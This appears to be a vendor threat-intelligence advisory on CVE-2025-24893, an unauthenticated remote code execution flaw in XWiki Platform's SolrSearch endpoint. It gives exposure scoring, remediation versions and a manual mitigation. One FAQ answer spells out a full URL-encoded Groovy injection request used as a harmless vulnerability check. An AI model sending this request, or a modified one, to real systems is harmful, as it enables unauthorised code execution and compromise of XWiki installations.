External risk intelligence

XWiki Platform Remote Code Execution Vulnerability.

CVE advisoryKnown Exploit

CVE-2025-24893

A vulnerability in XWiki Platform allows unauthenticated users to execute arbitrary code, impacting data confidentiality, integrity, and availability. This risk is associated with the `SolrSearch` function and requires immediate attention.

4Halo Surface Signal

Code Injection

Xwiki

5.4 to before 15.10.1116.0.0 to before 16.4.15.3

External exposure likelihood

Halo Surface Signal score for CVE-2025-24893

XWiki is a web-based collaboration platform commonly deployed as an internet-facing or intranet-facing web application. As a wiki platform, it is frequently exposed to allow user collaboration, making web endpoints like SolrSearch accessible to users. The vulnerability allows exploitation by unauthenticated guests, placing it in the category of reachable web-based services.

Horizon Alert

Summary of the vulnerability and why it matters

XWiki Platform, a wiki platform, has a vulnerability that allows unauthenticated users to execute arbitrary code. This flaw can affect the confidentiality, integrity, and availability of the entire XWiki installation. The vulnerability exists within the `SolrSearch` functionality.

XWiki Platform's `SolrSearch` functionality.
Allows unauthenticated remote code execution.
Impacts data confidentiality, integrity, and availability.

Attack Path

How an attacker could exploit the issue

An attacker can exploit a vulnerability in the XWiki Platform to execute arbitrary code remotely. This attack is possible without authentication, impacting the confidentiality, integrity, and availability of XWiki installations. The vulnerability is triggered through a specific request to the `SolrSearch` functionality.

Exposure condition: Publicly accessible `SolrSearch` endpoint.
Attacker starting point: Unauthenticated access.
Trigger and result: Malicious request leads to remote code execution.

Live Threat

Current exploitation, exposure, and threat context

The XWiki Platform contains a critical vulnerability that allows unauthenticated remote code execution. Attackers can exploit this by sending a specially crafted request to the `SolrSearch` function. Successful exploitation could lead to a complete compromise of the XWiki installation, affecting the confidentiality, integrity, and availability of all data and systems. Organizations are advised to treat this vulnerability with high urgency due to its severe impact and ease of exploitation.

Likely attacker skill level: Low
Required access or conditions: None (unauthenticated)
Business risk or urgency: Critical

Priority actions

Operational Fix

Recommended remediation, mitigation, and detection steps

The organization should take immediate action to address a critical vulnerability in XWiki Platform that allows unauthenticated remote code execution. This vulnerability impacts the confidentiality, integrity, and availability of XWiki installations. The exploitation can occur through a request to `SolrSearch`, and the instance is vulnerable if a specific output is observed. Mitigation involves upgrading to patched versions or applying manual configuration changes.

Identify all exposed XWiki assets.
Reduce exposure or isolate affected systems.
Apply vendor fix, verify, and monitor.

Frequently asked questions

What is the primary function of XWiki Platform and what type of vulnerability does it contain?

XWiki Platform serves as a generic wiki platform, providing runtime services for applications built upon it. It currently contains a critical vulnerability that allows for arbitrary remote code execution by unauthenticated users. This flaw impacts the confidentiality, integrity, and availability of the entire XWiki installation.

How can the XWiki Platform vulnerability be exploited, and what is the weakness class involved?

The vulnerability in XWiki Platform can be exploited through a specific request to the `SolrSearch` functionality. This flaw is classified as an injection vulnerability, specifically CWE-95 (Code Injection) and CWE-94 (Improper Control of Generation of Code 'Code Injection'), enabling arbitrary remote code execution.

What is the trigger path for the XWiki Platform vulnerability, and does it involve scope negation?

The trigger path involves sending a specially crafted request to `<host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20`. An instance is vulnerable if the RSS feed title contains 'Hello from search text:42'. The vulnerability does not appear to involve explicit scope negation in the trigger itself.

What is the relevance of the XWiki Platform vulnerability, considering its 'Likely' exposure signal?

The XWiki Platform vulnerability has a 'Likely' exposure signal because XWiki is a web-based collaboration platform often deployed facing the internet or internal networks, making endpoints like `SolrSearch` accessible to users. The ability for unauthenticated guests to exploit this vulnerability contributes to its significant relevance for organizations using XWiki.

What practical steps should users take to respond to the XWiki Platform vulnerability?

Users should upgrade to patched versions of XWiki Platform: 15.10.11, 16.4.1, or 16.5.0RC1. If an upgrade is not immediately feasible, administrators can manually mitigate the issue by editing `Main.SolrSearchMacros` on line 955 of `SolrSearchMacros.xml`. The change involves matching the `rawResponse` macro in `macros.vm` (L2824) with a content type of `application/xml`.

References

Written by Nicholas Merritt

External-surface CVE analysis and Halo Surface Signal prioritization for Halo Threat Intelligence.